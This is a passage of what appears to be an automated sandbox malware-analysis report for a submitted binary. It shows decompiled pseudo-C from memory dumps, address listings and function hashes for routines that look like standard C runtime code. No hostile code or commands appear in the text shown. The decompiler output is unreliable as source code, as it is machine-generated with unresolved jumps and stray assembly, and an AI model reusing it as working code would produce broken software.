				E00007FF77FF735C53B18(_t114);
				 *_t114 = 0x16;
				_t166 = _t165 | 0xffffffff;
				E00007FF77FF735C59468(_t114, __rcx);
				goto 0x35c5f2c3;
				_t181 =  *0x35c8a9c0; // 0x0
				_t89 = _t181 -  *0x35c8a9d8; // 0x0
				if (_t89 != 0) goto 0x35c5f0e9;
				_t40 = E00007FF77FF735C5F654(_t123, _t181, __rcx, _t164);
				 *0x35c8a9c0 = _t114;
				goto 0x35c5f0e9;
				if (bpl == 0) goto 0x35c5f1a2;
				E00007FF77FF735C5D3D0(_t40, _t175, __rdx);
				 *0x35c8a9c0 = _t114;
				_t42 = E00007FF77FF735C59468(_t114, _t175);
				_t183 =  *0x35c8a9c0; // 0x0
				if (_t183 == 0) goto 0x35c5f04a;
				_t92 =  *0x35c8a9c8 - _t164; // 0x293619a8410
				if (_t92 != 0) goto 0x35c5f0e9;
				E00007FF77FF735C5D3D0(_t42, _t175, __rdx);
				 *0x35c8a9c8 = _t114;
				E00007FF77FF735C59468(_t114, _t175);
				_t93 =  *0x35c8a9c8 - _t164; // 0x293619a8410
				if (_t93 == 0) goto 0x35c5f04a;
				_t184 =  *0x35c8a9c0; // 0x0
				if (_t184 == 0) goto 0x35c5f04a;
				_t177 = _t178 - __rcx;
				_t124 = _t184;
				if ( *_t184 == 0) goto 0x35c5f137;
				if (E00007FF77FF735C65664(_t76, _t124, __rcx,  *_t184, _t164, _t166, _t177, __r9) != 0) goto 0x35c5f125;
				_t116 =  *_t124;
				if ( *((char*)(_t177 + _t116)) == 0x3d) goto 0x35c5f12e;
				if ( *((intOrPtr*)(_t177 + _t116)) == sil) goto 0x35c5f12e;
				goto 0x35c5f0fe;
				goto 0x35c5f141;
				_t130 =  ~((_t124 + 8 - _t184 >> 3) - _t184 >> 3);
				if (_t130 < 0) goto 0x35c5f19d;
				if ( *_t184 == _t164) goto 0x35c5f19d;
				_t46 = E00007FF77FF735C59468( *((intOrPtr*)(_t124 + 8)),  *(_t184 + _t130 * 8));
				if (bpl == 0) goto 0x35c5f16e;
				 *(_t184 + _t130 * 8) = __rcx;
				goto 0x35c5f1fd;
				_t118 =  *((intOrPtr*)(_t184 + 8 + _t130 * 8));
				 *(_t184 + _t130 * 8) = _t118;
				if ( *((intOrPtr*)(_t184 + (_t130 + 1) * 8)) != _t164) goto 0x35c5f162;
				r8d = 8;
				E00007FF77FF735C61A54(_t46, _t130 + 1, _t184, _t130 + 1, _t164, _t166, _t177);
				_t132 = _t118;
				_t48 = E00007FF77FF735C59468(_t118, _t184);
				if (_t132 == 0) goto 0x35c5f200;
				 *0x35c8a9c0 = _t132;
				goto 0x35c5f200;
				if (bpl != 0) goto 0x35c5f1a9;
				goto 0x35c5f04e;
				_t133 =  ~_t132;
				_t18 = _t133 + 2; // 0x2
				_t159 = _t18;
				if (_t159 - _t133 < 0) goto 0x35c5f04a;
				if (_t159 - 0xffffffff >= 0) goto 0x35c5f04a;
				r8d = 8;
				E00007FF77FF735C61A54(_t48, _t133, _t184, _t159, _t164, _t166, _t177);
				_t50 = E00007FF77FF735C59468(0xffffffff, _t184);
				if (0xffffffff == 0) goto 0x35c5f04a;
				 *((long long*)(0xffffffff + _t133 * 8)) = _t188;
				 *((long long*)(0xffffffff + 8 + _t133 * 8)) = _t164;
				 *0x35c8a9c0 = 0xffffffff;
				if (_a16 == 0) goto 0x35c5f2a0;
				_t187 = (_t166 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(_t188 + (_t166 | 0xffffffff) + 1)) != sil) goto 0x35c5f211;
				E00007FF77FF735C5D3D0(_t50, (_t166 | 0xffffffff) + 3, _t159);
				if (0xffffffff != 0) goto 0x35c5f239;
				E00007FF77FF735C59468(0xffffffff, (_t166 | 0xffffffff) + 3);
				goto 0x35c5f28c;
				if (E00007FF77FF735C5880C(0xffffffff, 0xffffffff, _t187 + 2, _t188) != 0) goto 0x35c5f2db;
				_t28 = _t178 + 1; // 0x1
				_t121 = 0xffffffff - _t188;
				_a8 =  ~_a8;
				asm("dec eax");
				 *((intOrPtr*)(_t28 + _t121 - 1)) = sil;
				if (E00007FF77FF735C6577C(0, E00007FF77FF735C5880C(0xffffffff, 0xffffffff, _t187 + 2, _t188), 0xffffffff, 0xffffffff, _t187 + 0x00000002 & _t28 + _t121, _t164, _t164, _t188, __r9, _t174) != 0) goto 0x35c5f298;
				E00007FF77FF735C53B18(_t121);
				 *_t121 = 0x2a;
				E00007FF77FF735C59468(_t121, 0xffffffff);
				E00007FF77FF735C59468(_t121, _t164);
				goto 0x35c5f2c3;
				E00007FF77FF735C59468(_t121, 0xffffffff);
				E00007FF77FF735C59468(_t121, _t164);
				goto 0x35c5f2c3;
				E00007FF77FF735C53B18(_t121);
				 *_t121 = 0x16;
				return E00007FF77FF735C59468(_t121, _t188);
			}






































                                                                                                                                                                                                                              0x7ff735c5ef98
                                                                                                                                                                                                                              0x7ff735c5ef98
                                                                                                                                                                                                                              0x7ff735c5ef98
                                                                                                                                                                                                                              0x7ff735c5ef9d
                                                                                                                                                                                                                              0x7ff735c5efb4
                                                                                                                                                                                                                              0x7ff735c5efba
                                                                                                                                                                                                                              0x7ff735c5efbc
                                                                                                                                                                                                                              0x7ff735c5efc1
                                                                                                                                                                                                                              0x7ff735c5efc7
                                                                                                                                                                                                                              0x7ff735c5efd4
                                                                                                                                                                                                                              0x7ff735c5efd9
                                                                                                                                                                                                                              0x7ff735c5efdf
                                                                                                                                                                                                                              0x7ff735c5efe8
                                                                                                                                                                                                                              0x7ff735c5efee
                                                                                                                                                                                                                              0x7ff735c5eff5
                                                                                                                                                                                                                              0x7ff735c5effc
                                                                                                                                                                                                                              0x7ff735c5f000
                                                                                                                                                                                                                              0x7ff735c5f005
                                                                                                                                                                                                                              0x7ff735c5f00a
                                                                                                                                                                                                                              0x7ff735c5f012
                                                                                                                                                                                                                              0x7ff735c5f019
                                                                                                                                                                                                                              0x7ff735c5f022
                                                                                                                                                                                                                              0x7ff735c5f02a
                                                                                                                                                                                                                              0x7ff735c5f02c
                                                                                                                                                                                                                              0x7ff735c5f033
                                                                                                                                                                                                                              0x7ff735c5f035
                                                                                                                                                                                                                              0x7ff735c5f03d
                                                                                                                                                                                                                              0x7ff735c5f03f
                                                                                                                                                                                                                              0x7ff735c5f044
                                                                                                                                                                                                                              0x7ff735c5f04a
                                                                                                                                                                                                                              0x7ff735c5f051
                                                                                                                                                                                                                              0x7ff735c5f058
                                                                                                                                                                                                                              0x7ff735c5f05d
                                                                                                                                                                                                                              0x7ff735c5f064
                                                                                                                                                                                                                              0x7ff735c5f06b
                                                                                                                                                                                                                              0x7ff735c5f070
                                                                                                                                                                                                                              0x7ff735c5f078
                                                                                                                                                                                                                              0x7ff735c5f07f
                                                                                                                                                                                                                              0x7ff735c5f084
                                                                                                                                                                                                                              0x7ff735c5f092
                                                                                                                                                                                                                              0x7ff735c5f099
                                                                                                                                                                                                                              0x7ff735c5f0a0
                                                                                                                                                                                                                              0x7ff735c5f0a5
                                                                                                                                                                                                                              0x7ff735c5f0af
                                                                                                                                                                                                                              0x7ff735c5f0b1
                                                                                                                                                                                                                              0x7ff735c5f0b8
                                                                                                                                                                                                                              0x7ff735c5f0c2
                                                                                                                                                                                                                              0x7ff735c5f0c9
                                                                                                                                                                                                                              0x7ff735c5f0d0
                                                                                                                                                                                                                              0x7ff735c5f0d5
                                                                                                                                                                                                                              0x7ff735c5f0dc
                                                                                                                                                                                                                              0x7ff735c5f0e2
                                                                                                                                                                                                                              0x7ff735c5f0ec
                                                                                                                                                                                                                              0x7ff735c5f0f8
                                                                                                                                                                                                                              0x7ff735c5f0fb
                                                                                                                                                                                                                              0x7ff735c5f101
                                                                                                                                                                                                                              0x7ff735c5f113
                                                                                                                                                                                                                              0x7ff735c5f115
                                                                                                                                                                                                                              0x7ff735c5f11d
                                                                                                                                                                                                                              0x7ff735c5f123
                                                                                                                                                                                                                              0x7ff735c5f12c
                                                                                                                                                                                                                              0x7ff735c5f135
                                                                                                                                                                                                                              0x7ff735c5f13e
                                                                                                                                                                                                                              0x7ff735c5f144
                                                                                                                                                                                                                              0x7ff735c5f149
                                                                                                                                                                                                                              0x7ff735c5f14f
                                                                                                                                                                                                                              0x7ff735c5f157
                                                                                                                                                                                                                              0x7ff735c5f159
                                                                                                                                                                                                                              0x7ff735c5f15d
                                                                                                                                                                                                                              0x7ff735c5f162
                                                                                                                                                                                                                              0x7ff735c5f167
                                                                                                                                                                                                                              0x7ff735c5f172
                                                                                                                                                                                                                              0x7ff735c5f174
                                                                                                                                                                                                                              0x7ff735c5f180
                                                                                                                                                                                                                              0x7ff735c5f187
                                                                                                                                                                                                                              0x7ff735c5f18a
                                                                                                                                                                                                                              0x7ff735c5f192
                                                                                                                                                                                                                              0x7ff735c5f194
                                                                                                                                                                                                                              0x7ff735c5f19b
                                                                                                                                                                                                                              0x7ff735c5f1a0
                                                                                                                                                                                                                              0x7ff735c5f1a4
                                                                                                                                                                                                                              0x7ff735c5f1a9
                                                                                                                                                                                                                              0x7ff735c5f1ac
                                                                                                                                                                                                                              0x7ff735c5f1ac
                                                                                                                                                                                                                              0x7ff735c5f1b3
                                                                                                                                                                                                                              0x7ff735c5f1c6
                                                                                                                                                                                                                              0x7ff735c5f1cc
                                                                                                                                                                                                                              0x7ff735c5f1d5
                                                                                                                                                                                                                              0x7ff735c5f1df
                                                                                                                                                                                                                              0x7ff735c5f1e7
                                                                                                                                                                                                                              0x7ff735c5f1ed
                                                                                                                                                                                                                              0x7ff735c5f1f1
                                                                                                                                                                                                                              0x7ff735c5f1f6
                                                                                                                                                                                                                              0x7ff735c5f204
                                                                                                                                                                                                                              0x7ff735c5f211
                                                                                                                                                                                                                              0x7ff735c5f218
                                                                                                                                                                                                                              0x7ff735c5f223
                                                                                                                                                                                                                              0x7ff735c5f22e
                                                                                                                                                                                                                              0x7ff735c5f232
                                                                                                                                                                                                                              0x7ff735c5f237
                                                                                                                                                                                                                              0x7ff735c5f24a
                                                                                                                                                                                                                              0x7ff735c5f253
                                                                                                                                                                                                                              0x7ff735c5f257
                                                                                                                                                                                                                              0x7ff735c5f25d
                                                                                                                                                                                                                              0x7ff735c5f261
                                                                                                                                                                                                                              0x7ff735c5f267
                                                                                                                                                                                                                              0x7ff735c5f275
                                                                                                                                                                                                                              0x7ff735c5f277
                                                                                                                                                                                                                              0x7ff735c5f27f
                                                                                                                                                                                                                              0x7ff735c5f285
                                                                                                                                                                                                                              0x7ff735c5f28f
                                                                                                                                                                                                                              0x7ff735c5f296
                                                                                                                                                                                                                              0x7ff735c5f29b
                                                                                                                                                                                                                              0x7ff735c5f2a3
                                                                                                                                                                                                                              0x7ff735c5f2aa
                                                                                                                                                                                                                              0x7ff735c5f2ac
                                                                                                                                                                                                                              0x7ff735c5f2b4
                                                                                                                                                                                                                              0x7ff735c5f2da

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1010374628-0
                                                                                                                                                                                                                              • Opcode ID: faf6510fc3af595c16c5cd0d153c07d693ceabac6e55a95d4eae8abd4812e8ac
                                                                                                                                                                                                                              • Instruction ID: cb759901312bf836047aabc9307a1222cf11a292aa8466aed56ec479615d0a49
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: faf6510fc3af595c16c5cd0d153c07d693ceabac6e55a95d4eae8abd4812e8ac
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4602A0E3E0D64361FA59BB939800279E294AF41FA8FC54A35DD6D463D2DE7CA801E330
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C649DC Relevance: 1.7, APIs: 1, Instructions: 182COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 60%
                                                                                                                                                                                                                              			E00007FF77FF735C649DC(signed int __ecx, signed int __ebp, long long __rbx, signed char* __rdx, long long __rsi, long long __rbp, void* __r8, intOrPtr* __r9, signed int _a8, void* _a16, void* _a24, void* _a32) {
				void* __rdi;
				signed int _t45;
				signed int _t49;
				signed char _t50;
				void* _t56;
				void* _t63;
				signed int _t77;
				signed int _t88;
				signed int _t89;
				unsigned int _t90;
				void* _t95;
				void* _t109;
				intOrPtr* _t127;
				void* _t132;
				void* _t138;
				void* _t145;
				void* _t152;
				void* _t153;
				intOrPtr* _t154;
				void* _t156;

				_t129 = __rbx;
				_t152 = _t145;
				 *((long long*)(_t152 + 0x10)) = __rbx;
				 *((long long*)(_t152 + 0x18)) = __rbp;
				 *((long long*)(_t152 + 0x20)) = __rsi;
				_push(_t138);
				 *((char*)(__r9)) = 0;
				r10d = r10d & 0x0000003f;
				_t154 = __r9;
				_t88 = r8d;
				_t127 =  *((intOrPtr*)(0x35c8aa40 + (__ecx >> 6) * 8));
				if ( *((intOrPtr*)(_t127 + 0x38 + (__ecx + __ecx * 8) * 8)) >= 0) goto 0x35c64c23;
				if ((0x00074000 & r8d) != 0) goto 0x35c64a58;
				_t132 = _t152 + 8;
				_a8 = 0;
				_t95 = E00007FF77FF735C54E4C(_t127, _t132);
				if (_t95 != 0) goto 0x35c64c3e;
				if (_t95 != 0) goto 0x35c64a92;
				asm("bts esi, 0xe");
				if ((_t88 & 0x00074000) == 0x4000) goto 0x35c64aa8;
				if ((0xffffbfff & _t132 - 0x00010000) == 0) goto 0x35c64a96;
				if ((0xffffbfff & _t132 - 0x00020000) == 0) goto 0x35c64aa3;
				_t45 = _t132 - 0x40000;
				if ((0xffffbfff & _t45) != 0) goto 0x35c64aab;
				 *((char*)(__r9)) = 1;
				goto 0x35c64aab;
				_t89 = _t88 | _t45;
				goto 0x35c64a58;
				if ((_t89 & 0x00000301) != 0x301) goto 0x35c64aab;
				 *__r9 = dil;
				goto 0x35c64aab;
				 *((char*)(__r9)) = 0;
				if ((_t89 & 0x00070000) == 0) goto 0x35c64c23;
				if (( *__rdx & 0x00000040) != 0) goto 0x35c64c23;
				_t90 = __rdx[4];
				_t49 = _t90 & 0xc0000000;
				if (_t49 == 0x40000000) goto 0x35c64ae8;
				if (_t49 == 0x80000000) goto 0x35c64b60;
				if (_t49 != 0xc0000000) goto 0x35c64c23;
				_t50 = __rdx[8];
				if (_t50 == 0) goto 0x35c64c23;
				if (_t50 - 2 <= 0) goto 0x35c64b06;
				if (_t50 - 4 <= 0) goto 0x35c64b26;
				_t109 = _t50 - 5;
				if (_t109 != 0) goto 0x35c64c23;
				if (_t109 == 0) goto 0x35c64bee;
				if ( *((char*)(__r9)) - 1 != 1) goto 0x35c64c23;
				goto 0x35c64bf8;
				r8d = 2;
				E00007FF77FF735C5ADB8(_t127, __rbx, _t138, _t156, _t153);
				if (_t127 == 0) goto 0x35c64b06;
				r8d = 0;
				E00007FF77FF735C5ADB8(_t127, _t129, _t138);
				if (_t127 != 0xffffffff) goto 0x35c64b55;
				E00007FF77FF735C53B18(_t127);
				goto 0x35c64c25;
				if (_t90 >> 0x1f == 0) goto 0x35c64c23;
				r8d = 3;
				_a8 = 0;
				_t56 = E00007FF77FF735C5A588(__ebp, _t90 >> 0x1f, _t127, _t132,  &_a8, __r8);
				if (_t56 == 0xffffffff) goto 0x35c64b49;
				if (_t56 == 2) goto 0x35c64b98;
				if (_t56 != 3) goto 0x35c64bd7;
				if (_a8 != 0xbfbbef) goto 0x35c64b98;
				 *_t154 = 1;
				goto 0x35c64c23;
				_t77 = _a8 & 0x0000ffff;
				if (_t77 != 0xfffe) goto 0x35c64bb2;
				E00007FF77FF735C53B18(_t127);
				 *_t127 = 0x16;
				goto 0x35c64b49;
				if (_t77 != 0xfeff) goto 0x35c64bd7;
				r8d = 0;
				E00007FF77FF735C5ADB8(_t127, _t129, _t138);
				if (_t127 == 0xffffffff) goto 0x35c64b49;
				 *_t154 = dil;
				goto 0x35c64c23;
				r8d = 0;
				E00007FF77FF735C5ADB8(_t127, _t129, _t138);
				if (_t127 != 0xffffffff) goto 0x35c64c23;
				goto 0x35c64b49;
				_a8 = 0xbfbbef;
				r8d = 3;
				r8d = r8d;
				_t63 = E00007FF77FF735C5B8EC(0, _t129, _t138);
				if (_t63 == 0xffffffff) goto 0x35c64b49;
				if (3 - 0 + _t63 > 0) goto 0x35c64bfc;
				return 0;
			}























                                                                                                                                                                                                                              0x7ff735c649dc
                                                                                                                                                                                                                              0x7ff735c649dc
                                                                                                                                                                                                                              0x7ff735c649df
                                                                                                                                                                                                                              0x7ff735c649e3
                                                                                                                                                                                                                              0x7ff735c649e7
                                                                                                                                                                                                                              0x7ff735c649eb
                                                                                                                                                                                                                              0x7ff735c649fc
                                                                                                                                                                                                                              0x7ff735c649ff
                                                                                                                                                                                                                              0x7ff735c64a0d
                                                                                                                                                                                                                              0x7ff735c64a14
                                                                                                                                                                                                                              0x7ff735c64a1e
                                                                                                                                                                                                                              0x7ff735c64a27
                                                                                                                                                                                                                              0x7ff735c64a35
                                                                                                                                                                                                                              0x7ff735c64a37
                                                                                                                                                                                                                              0x7ff735c64a3b
                                                                                                                                                                                                                              0x7ff735c64a44
                                                                                                                                                                                                                              0x7ff735c64a46
                                                                                                                                                                                                                              0x7ff735c64a52
                                                                                                                                                                                                                              0x7ff735c64a54
                                                                                                                                                                                                                              0x7ff735c64a67
                                                                                                                                                                                                                              0x7ff735c64a76
                                                                                                                                                                                                                              0x7ff735c64a80
                                                                                                                                                                                                                              0x7ff735c64a82
                                                                                                                                                                                                                              0x7ff735c64a8a
                                                                                                                                                                                                                              0x7ff735c64a8c
                                                                                                                                                                                                                              0x7ff735c64a90
                                                                                                                                                                                                                              0x7ff735c64a92
                                                                                                                                                                                                                              0x7ff735c64a94
                                                                                                                                                                                                                              0x7ff735c64aa1
                                                                                                                                                                                                                              0x7ff735c64aa3
                                                                                                                                                                                                                              0x7ff735c64aa6
                                                                                                                                                                                                                              0x7ff735c64aa8
                                                                                                                                                                                                                              0x7ff735c64ab1
                                                                                                                                                                                                                              0x7ff735c64abb
                                                                                                                                                                                                                              0x7ff735c64ac1
                                                                                                                                                                                                                              0x7ff735c64acc
                                                                                                                                                                                                                              0x7ff735c64ad3
                                                                                                                                                                                                                              0x7ff735c64ada
                                                                                                                                                                                                                              0x7ff735c64ae2
                                                                                                                                                                                                                              0x7ff735c64ae8
                                                                                                                                                                                                                              0x7ff735c64aee
                                                                                                                                                                                                                              0x7ff735c64af6
                                                                                                                                                                                                                              0x7ff735c64afb
                                                                                                                                                                                                                              0x7ff735c64afd
                                                                                                                                                                                                                              0x7ff735c64b00
                                                                                                                                                                                                                              0x7ff735c64b0d
                                                                                                                                                                                                                              0x7ff735c64b16
                                                                                                                                                                                                                              0x7ff735c64b21
                                                                                                                                                                                                                              0x7ff735c64b26
                                                                                                                                                                                                                              0x7ff735c64b2d
                                                                                                                                                                                                                              0x7ff735c64b35
                                                                                                                                                                                                                              0x7ff735c64b37
                                                                                                                                                                                                                              0x7ff735c64b3e
                                                                                                                                                                                                                              0x7ff735c64b47
                                                                                                                                                                                                                              0x7ff735c64b49
                                                                                                                                                                                                                              0x7ff735c64b50
                                                                                                                                                                                                                              0x7ff735c64b5a
                                                                                                                                                                                                                              0x7ff735c64b60
                                                                                                                                                                                                                              0x7ff735c64b66
                                                                                                                                                                                                                              0x7ff735c64b71
                                                                                                                                                                                                                              0x7ff735c64b79
                                                                                                                                                                                                                              0x7ff735c64b7d
                                                                                                                                                                                                                              0x7ff735c64b82
                                                                                                                                                                                                                              0x7ff735c64b8d
                                                                                                                                                                                                                              0x7ff735c64b8f
                                                                                                                                                                                                                              0x7ff735c64b93
                                                                                                                                                                                                                              0x7ff735c64b98
                                                                                                                                                                                                                              0x7ff735c64ba3
                                                                                                                                                                                                                              0x7ff735c64ba5
                                                                                                                                                                                                                              0x7ff735c64baa
                                                                                                                                                                                                                              0x7ff735c64bb0
                                                                                                                                                                                                                              0x7ff735c64bb9
                                                                                                                                                                                                                              0x7ff735c64bbb
                                                                                                                                                                                                                              0x7ff735c64bc3
                                                                                                                                                                                                                              0x7ff735c64bcc
                                                                                                                                                                                                                              0x7ff735c64bd2
                                                                                                                                                                                                                              0x7ff735c64bd5
                                                                                                                                                                                                                              0x7ff735c64bd7
                                                                                                                                                                                                                              0x7ff735c64bde
                                                                                                                                                                                                                              0x7ff735c64be7
                                                                                                                                                                                                                              0x7ff735c64be9
                                                                                                                                                                                                                              0x7ff735c64bf8
                                                                                                                                                                                                                              0x7ff735c64bfc
                                                                                                                                                                                                                              0x7ff735c64c07
                                                                                                                                                                                                                              0x7ff735c64c0f
                                                                                                                                                                                                                              0x7ff735c64c17
                                                                                                                                                                                                                              0x7ff735c64c21
                                                                                                                                                                                                                              0x7ff735c64c3d

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 474895018-0
                                                                                                                                                                                                                              • Opcode ID: e0a7a17bac95bc6ee1e105a3b59d82723e5326956a8ae8493ae2e299ddb91892
                                                                                                                                                                                                                              • Instruction ID: c471bc7eb3c4525a62cbba7bad3b3e416bdab02f388a42ec1f3b111a661331ae
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e0a7a17bac95bc6ee1e105a3b59d82723e5326956a8ae8493ae2e299ddb91892
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F612823F0CA4365FB60A92584D07BDF2909F80F68F9D0735DA2D836D5DEADE940A720
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C5C278 Relevance: 1.5, Strings: 1, Instructions: 260COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 69%
                                                                                                                                                                                                                              			E00007FF77FF735C5C278(void* __rax, long long __rbx, unsigned int* __rcx, signed long long __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long __r11, long long _a8, long long _a16, long long _a24, char* _a40, signed int _a48, signed int _a56, intOrPtr _a64, intOrPtr _a72, long long _a80) {
				void* _v40;
				long long _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				signed int _v72;
				unsigned int* _v80;
				long long _v88;
				void* __rdi;
				intOrPtr _t83;
				void* _t84;
				void* _t86;
				signed int _t88;
				unsigned int* _t121;
				signed int _t122;
				void* _t140;
				char* _t159;
				unsigned long long _t171;
				char* _t185;
				char* _t186;
				intOrPtr _t187;
				unsigned int* _t190;
				char* _t193;
				intOrPtr* _t198;
				intOrPtr* _t199;
				void* _t200;
				void* _t203;
				void* _t204;
				signed long long _t207;
				signed long long _t212;
				signed long long _t215;
				void* _t218;
				char* _t220;
				void* _t221;
				signed int* _t223;
				signed int* _t232;
				signed int* _t233;
				signed int* _t234;
				signed int* _t240;
				long long _t244;
				void* _t246;
				intOrPtr* _t247;
				unsigned int* _t248;

				_t244 = __r11;
				_t230 = __r8;
				_t225 = __rbp;
				_t219 = __rsi;
				_t207 = __rdx;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				r11d = 0;
				 *__rdx = r11b;
				_t121 =  >=  ? _a48 : r11d;
				_t185 = __rdx;
				_t248 = __rcx;
				_t5 = _t218 + 0xb; // 0xb
				if (__r8 - _t5 > 0) goto 0x35c5c2f0;
				_t190 = _a80;
				_t7 = _t244 + 0x22; // 0x22
				_v80 = _t190;
				r9d = 0;
				r8d = 0;
				_v88 = __r11;
				_t190[0xc] = 1;
				_t190[0xb] = _t7;
				E00007FF77FF735C59330(__rax, __rdx, _t190, __rdx, __rsi, __rbp, __r8);
				goto 0x35c5c60e;
				if (( *_t190 >> 0x00000034 & _t207) != _t207) goto 0x35c5c38f;
				_v48 = _a80;
				_v56 = _a72;
				_v64 = _a64;
				_t159 = _a40;
				_v72 = r11b;
				_v80 = _t121;
				_v88 = _t159;
				if (E00007FF77FF735C5C62C(_t185, _t248, _t185, _t218, _t219, _t230, __r9) == 0) goto 0x35c5c35e;
				 *_t185 = 0;
				goto 0x35c5c60e;
				_t193 = _t185;
				E00007FF77FF735C4BA10(_t76, 0x65, _t159, _t193);
				if (_t159 == 0) goto 0x35c5c60c;
				 *_t159 = ((_a56 ^ 0x00000001) << 5) + 0x50;
				 *((char*)(_t159 + 3)) = 0;
				goto 0x35c5c60c;
				if (_t193 >= 0) goto 0x35c5c3a1;
				 *_t185 = 0x2d;
				_t186 = _t185 + 1;
				_t247 = _t186 + 1;
				r12d = 0x3ff;
				r15d = (_a56 ^ 0x00000001) & 0x000000ff;
				r8d = 0x30;
				_a48 = r15d;
				if ((0x00000000 &  *_t248) != 0) goto 0x35c5c400;
				 *_t186 = r8b;
				asm("dec ebp");
				r12d = r12d & 0x000003fe;
				goto 0x35c5c403;
				 *_t186 = 0x31;
				_t220 = _t247 + 1;
				if (_t121 != 0) goto 0x35c5c410;
				goto 0x35c5c447;
				_t187 = _a80;
				if ( *((intOrPtr*)(_t187 + 0x28)) != r11b) goto 0x35c5c437;
				E00007FF77FF735C53100( ~( *_t248 & 0xffffffff), _t187, _t187, _t220);
				r11d = 0;
				_t32 = _t244 + 0x30; // 0x30
				r8d = _t32;
				_t83 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x18)) + 0xf8))))));
				 *_t247 = _t83;
				if (( *_t248 & 0xffffffff) <= 0) goto 0x35c5c4eb;
				if (_t121 <= 0) goto 0x35c5c495;
				_t84 = _t83 + r8w;
				_t140 = _t84 - 0x39;
				if (_t140 <= 0) goto 0x35c5c482;
				 *_t220 = _t84 + (r15d << 5) + 7;
				_t122 = _t121 - 1;
				_t221 = _t220 + 1;
				if (_t140 >= 0) goto 0x35c5c462;
				goto 0x35c5c4e3;
				r9d = _a72;
				r8d = r8w & 0xffff;
				_t86 = E00007FF77FF735C5CC90(_t84 + (r15d << 5) + 7, _t7, _t187, _t248, 0 >> 4, _t218, _t221, _t225);
				r11d = 0;
				if (_t86 == 0) goto 0x35c5c4e3;
				_t198 = _t221 - 1;
				if (0x47 != 0) goto 0x35c5c4c8;
				 *_t198 = 0x30;
				_t199 = _t198 - 1;
				goto 0x35c5c4b7;
				if (_t199 == _t247) goto 0x35c5c4e0;
				if ( *_t198 != 0x39) goto 0x35c5c4d8;
				bpl = bpl + 0x3a;
				goto 0x35c5c4db;
				 *_t199 = bpl;
				goto 0x35c5c4e3;
				 *((char*)(_t199 - 1)) =  *((char*)(_t199 - 1)) + 1;
				r15d = _a48;
				if (_t122 <= 0) goto 0x35c5c50c;
				r8d = _t122;
				_t200 = _t221;
				_t88 = E00007FF77FF735C4B800(0xbadb67, dil, _t200, 0 >> 4, _t230);
				r11d = 0;
				goto 0x35c5c511;
				_t223 =  ==  ? _t247 : _t221 + _t187;
				r15b = r15b << 5;
				r15b = r15b + 0x50;
				 *_t223 = r15b;
				_t240 =  &(_t223[0]);
				_t171 =  *_t248 >> 0x34;
				if ( *_t247 - r11b >= 0) goto 0x35c5c544;
				_t203 = _t246 - _t171;
				_t47 = _t171 + 2; // 0x2d
				_t91 =  <  ? _t47 : 0x2b;
				_t223[0] =  <  ? _t47 : 0x2b;
